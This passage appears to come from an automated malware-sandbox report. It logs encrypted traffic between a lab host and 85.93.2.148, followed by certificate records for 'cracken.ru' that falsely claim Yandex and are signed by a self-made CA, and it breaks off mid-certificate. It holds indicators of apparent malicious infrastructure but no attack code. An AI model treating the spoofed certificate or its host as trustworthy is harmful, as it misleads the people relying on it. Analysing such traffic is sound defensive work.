Nov 9, 2017 14:01:07.616699934 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:07.626754999 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:07.626971960 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:07.627264023 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:07.627429962 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:07.627482891 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:08.297745943 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:08.500480890 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:08.500701904 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:08.509295940 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:08.509495020 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:08.509718895 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:08.510251045 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:08.510296106 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:53.621213913 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:53.621274948 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:53.621995926 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:53.622769117 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:53.622793913 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:54.146044016 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:54.156970978 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:54.157011986 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:54.170855999 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:54.170917988 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:54.174230099 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:54.174267054 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:54.174623966 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:54.174639940 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:55.789771080 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:55.789818048 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:55.789900064 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:55.790915012 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:55.790942907 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:55.982198954 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.184468031 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.184781075 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.233095884 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.233125925 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.233289003 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.233304024 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.233318090 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.233483076 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.233501911 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.233588934 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.233599901 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.529485941 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.608778954 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.608804941 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.676901102 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.676923990 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.677572966 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.677587032 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.677644014 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.677656889 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:57.904277086 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:58.112447023 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:58.112648964 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:58.113092899 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:58.113116026 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:58.113235950 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:58.113298893 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:58.113390923 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:58.113424063 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:06.590076923 MEZ | 49170 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:06.590121984 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:06.590279102 MEZ | 49170 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:06.722912073 MEZ | 49170 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:06.722945929 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:07.483216047 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:07.483261108 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:07.483278990 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:07.483445883 MEZ | 49170 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:07.484750032 MEZ | 49170 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:07.484771967 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:07.485573053 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:07.688450098 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:07.692608118 MEZ | 49170 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:07.939991951 MEZ | 49170 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:07.954993963 MEZ | 49170 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:07.955244064 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:09.439654112 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:09.640497923 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:09.640644073 MEZ | 49170 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:09.641920090 MEZ | 49170 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:09.642052889 MEZ | 49170 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:09.642175913 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:09.642297983 MEZ | 49170 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:10.243783951 MEZ | 49171 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:10.243834019 MEZ | 443 | 49171 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:10.244062901 MEZ | 49171 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:10.244610071 MEZ | 49171 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:10.244642019 MEZ | 443 | 49171 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:10.888300896 MEZ | 443 | 49171 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:10.889394045 MEZ | 49171 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:10.889417887 MEZ | 443 | 49171 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:10.907659054 MEZ | 49171 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:10.907700062 MEZ | 443 | 49171 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:10.907833099 MEZ | 49171 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:10.907854080 MEZ | 443 | 49171 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:12.307487965 MEZ | 443 | 49171 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:12.512458086 MEZ | 443 | 49171 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:12.512732029 MEZ | 49171 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:12.513827085 MEZ | 49171 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:12.513847113 MEZ | 443 | 49171 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:12.514036894 MEZ | 443 | 49171 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:12.514098883 MEZ | 49171 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:02:12.514112949 MEZ | 443 | 49171 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:12.752481937 MEZ | 443 | 49171 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:02:12.752621889 MEZ | 49171 | 443 | 192.168.1.16 | 85.93.2.148 |
HTTP Request Dependency Graph |
---|
|
HTTPS Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Subject | Issuer | Not Before | Not After | Raw |
---|---|---|---|---|---|---|---|---|---|
Nov 9, 2017 14:01:04.835366964 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 | EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | Wed Nov 08 14:01:04 CET 2017 | Thu Nov 08 14:01:04 CET 2018 | [[ Version: V3 Subject: EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 148464715531648983675869436801448005946718863850793557755944285026680453005080864507211203883552953769741043350219011504910557537919669791969903003459896832340294027541878102542750730829212775320315093969922839142241184522778636197919003394994226649241173361768835857807624527555332056917985237383197977380209 public exponent: 3 Validity: [From: Wed Nov 08 14:01:04 CET 2017, To: Thu Nov 08 14:01:04 CET 2018] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ acda3d75 8bf3f455]Certificate Extensions: 5[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 8A 3D C0 D2 EA 50 C4 E3 0A 1A C9 E7 A0 F7 0E 99 .=...P..........0010: 44 00 50 00 D.P.]]] Algorithm: [SHA1withRSA] Signature:0000: 4D 84 94 4F 8E 83 0D 0B E4 17 B0 ED 04 4D 21 1E M..O.........M!.0010: F3 C9 56 10 73 3A 6F 57 F7 45 65 6E 4B 9A 69 C0 ..V.s:oW.EenK.i.0020: 0B F9 FC 2B C1 63 BE F8 71 7F 8C 3C BB 90 97 03 ...+.c..q..<....0030: FF E3 95 29 8D DD D1 E8 03 96 04 A9 E0 A2 31 5B ...)..........1[0040: AD 2D 04 E3 D8 52 CA FD 05 5E 96 C5 CC 76 44 76 .-...R...^...vDv0050: 02 0D 9D A1 E2 A3 8E 92 39 6D 3F A0 09 F5 4B 40 ........9m?...K@0060: 9D 61 4E 26 EB 1E AF 14 5C 29 00 0A 64 CA 0C 22 .aN&....\)..d.."0070: 73 E4 14 BB 7C 74 80 4E B4 BC A9 86 32 8E C2 AC s....t.N....2...0080: B5 E3 F1 83 2D C0 B9 89 4F AD E2 80 41 5E 89 8F ....-...O...A^..0090: 84 CA 2B 63 57 F9 44 96 D5 5C 72 96 BD 93 86 33 ..+cW.D..\r....300A0: 94 B5 95 C4 43 D6 FC 75 55 86 6C F9 FE F9 CF FC ....C..uU.l.....00B0: 55 DE B4 72 F7 4C F4 ED 71 6F 85 E1 00 2C 05 FE U..r.L..qo...,..00C0: C2 FC 25 7F 0A 1A E1 A2 3D 4B 7A 62 A2 F6 94 77 ..%.....=Kzb...w00D0: D8 47 F8 41 1B 3C F3 1A DC C8 8A 02 8C 3A 58 82 .G.A.<.......:X.00E0: 48 B5 BF E2 36 7A DD 19 FD F8 72 E8 ED ED A3 F8 H...6z....r.....00F0: E7 01 32 41 1A F7 8E 62 8A 13 D4 FC CD 20 49 B2 ..2A...b..... I.0100: 0E 6F 35 65 4C 8A C1 D7 59 53 0E E2 C8 A0 D5 FF .o5eL...YS......0110: B9 90 D2 2C 93 6F CB BD 64 70 47 B0 B5 59 49 59 ...,.o..dpG..YIY0120: A2 EE 9F 00 E5 CB 8C EB 0A 01 59 12 93 9A 6E A6 ..........Y...n.0130: 4B 09 40 7C 9B 18 3A CD 62 1F 24 D2 E1 A2 71 80 K.@...:.b.$...q.0140: D9 0C A2 1B 8E CF FD 25 FD 82 B7 1E 66 06 68 EF .......%....f.h.0150: 10 40 C3 EC 75 A0 8B E6 CC 49 F5 60 60 C9 36 1D .@..u....I.``.6.0160: B0 7A 46 87 07 04 D7 DE 4C 03 CD 73 54 E5 19 21 .zF.....L..sT..!0170: 4A BE E8 53 69 D5 24 1C 5F 36 2F CD 68 E5 7D E5 J..Si.$._6/.h...0180: 69 0B 16 47 2D DB 76 DA 7E 7C 7E 16 75 C1 9F 69 i..G-.v.....u..i0190: DC 46 5F 6B AA F1 DA 34 CD 4B 70 E3 82 67 BD 7C .F_k...4.Kp..g..01A0: 27 B0 1F 82 96 23 AE 94 24 0F 94 C8 43 4F 29 EE '....#..$...CO).01B0: 7E 9C 7A D2 F6 65 5D 3F 6C 4A 37 70 8B D6 92 64 ..z..e]?lJ7p...d01C0: 14 07 CA 17 52 14 EE 81 79 9D 7B 37 08 52 7F 58 ....R...y..7.R.X01D0: F4 3D F4 00 FD 8A 8E 20 A7 5B CF F2 2B E7 A8 14 .=..... .[..+...01E0: 15 C7 15 67 84 69 FD C2 72 6E 96 D5 1A 82 9C BB ...g.i..rn......01F0: 04 C9 D9 78 85 42 10 13 F0 55 A0 AA 7C 6B 3B 49 ...x.B...U...k;I] |
Nov 9, 2017 14:01:04.835366964 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | Tue Mar 17 15:16:38 CET 2015 | Thu Mar 09 15:16:38 CET 2045 | [[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c] |
Nov 9, 2017 14:01:06.452419043 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 | EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | Wed Nov 08 14:01:04 CET 2017 | Thu Nov 08 14:01:04 CET 2018 | [[ Version: V3 Subject: EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 148464715531648983675869436801448005946718863850793557755944285026680453005080864507211203883552953769741043350219011504910557537919669791969903003459896832340294027541878102542750730829212775320315093969922839142241184522778636197919003394994226649241173361768835857807624527555332056917985237383197977380209 public exponent: 3 Validity: [From: Wed Nov 08 14:01:04 CET 2017, To: Thu Nov 08 14:01:04 CET 2018] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ acda3d75 8bf3f455]Certificate Extensions: 5[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 8A 3D C0 D2 EA 50 C4 E3 0A 1A C9 E7 A0 F7 0E 99 .=...P..........0010: 44 00 50 00 D.P.]]] Algorithm: [SHA1withRSA] Signature:0000: 4D 84 94 4F 8E 83 0D 0B E4 17 B0 ED 04 4D 21 1E M..O.........M!.0010: F3 C9 56 10 73 3A 6F 57 F7 45 65 6E 4B 9A 69 C0 ..V.s:oW.EenK.i.0020: 0B F9 FC 2B C1 63 BE F8 71 7F 8C 3C BB 90 97 03 ...+.c..q..<....0030: FF E3 95 29 8D DD D1 E8 03 96 04 A9 E0 A2 31 5B ...)..........1[0040: AD 2D 04 E3 D8 52 CA FD 05 5E 96 C5 CC 76 44 76 .-...R...^...vDv0050: 02 0D 9D A1 E2 A3 8E 92 39 6D 3F A0 09 F5 4B 40 ........9m?...K@0060: 9D 61 4E 26 EB 1E AF 14 5C 29 00 0A 64 CA 0C 22 .aN&....\)..d.."0070: 73 E4 14 BB 7C 74 80 4E B4 BC A9 86 32 8E C2 AC s....t.N....2...0080: B5 E3 F1 83 2D C0 B9 89 4F AD E2 80 41 5E 89 8F ....-...O...A^..0090: 84 CA 2B 63 57 F9 44 96 D5 5C 72 96 BD 93 86 33 ..+cW.D..\r....300A0: 94 B5 95 C4 43 D6 FC 75 55 86 6C F9 FE F9 CF FC ....C..uU.l.....00B0: 55 DE B4 72 F7 4C F4 ED 71 6F 85 E1 00 2C 05 FE U..r.L..qo...,..00C0: C2 FC 25 7F 0A 1A E1 A2 3D 4B 7A 62 A2 F6 94 77 ..%.....=Kzb...w00D0: D8 47 F8 41 1B 3C F3 1A DC C8 8A 02 8C 3A 58 82 .G.A.<.......:X.00E0: 48 B5 BF E2 36 7A DD 19 FD F8 72 E8 ED ED A3 F8 H...6z....r.....00F0: E7 01 32 41 1A F7 8E 62 8A 13 D4 FC CD 20 49 B2 ..2A...b..... I.0100: 0E 6F 35 65 4C 8A C1 D7 59 53 0E E2 C8 A0 D5 FF .o5eL...YS......0110: B9 90 D2 2C 93 6F CB BD 64 70 47 B0 B5 59 49 59 ...,.o..dpG..YIY0120: A2 EE 9F 00 E5 CB 8C EB 0A 01 59 12 93 9A 6E A6 ..........Y...n.0130: 4B 09 40 7C 9B 18 3A CD 62 1F 24 D2 E1 A2 71 80 K.@...:.b.$...q.0140: D9 0C A2 1B 8E CF FD 25 FD 82 B7 1E 66 06 68 EF .......%....f.h.0150: 10 40 C3 EC 75 A0 8B E6 CC 49 F5 60 60 C9 36 1D .@..u....I.``.6.0160: B0 7A 46 87 07 04 D7 DE 4C 03 CD 73 54 E5 19 21 .zF.....L..sT..!0170: 4A BE E8 53 69 D5 24 1C 5F 36 2F CD 68 E5 7D E5 J..Si.$._6/.h...0180: 69 0B 16 47 2D DB 76 DA 7E 7C 7E 16 75 C1 9F 69 i..G-.v.....u..i0190: DC 46 5F 6B AA F1 DA 34 CD 4B 70 E3 82 67 BD 7C .F_k...4.Kp..g..01A0: 27 B0 1F 82 96 23 AE 94 24 0F 94 C8 43 4F 29 EE '....#..$...CO).01B0: 7E 9C 7A D2 F6 65 5D 3F 6C 4A 37 70 8B D6 92 64 ..z..e]?lJ7p...d01C0: 14 07 CA 17 52 14 EE 81 79 9D 7B 37 08 52 7F 58 ....R...y..7.R.X01D0: F4 3D F4 00 FD 8A 8E 20 A7 5B CF F2 2B E7 A8 14 .=..... .[..+...01E0: 15 C7 15 67 84 69 FD C2 72 6E 96 D5 1A 82 9C BB ...g.i..rn......01F0: 04 C9 D9 78 85 42 10 13 F0 55 A0 AA 7C 6B 3B 49 ...x.B...U...k;I] |
Nov 9, 2017 14:01:06.452419043 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | Tue Mar 17 15:16:38 CET 2015 | Thu Mar 09 15:16:38 CET 2045 | [[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 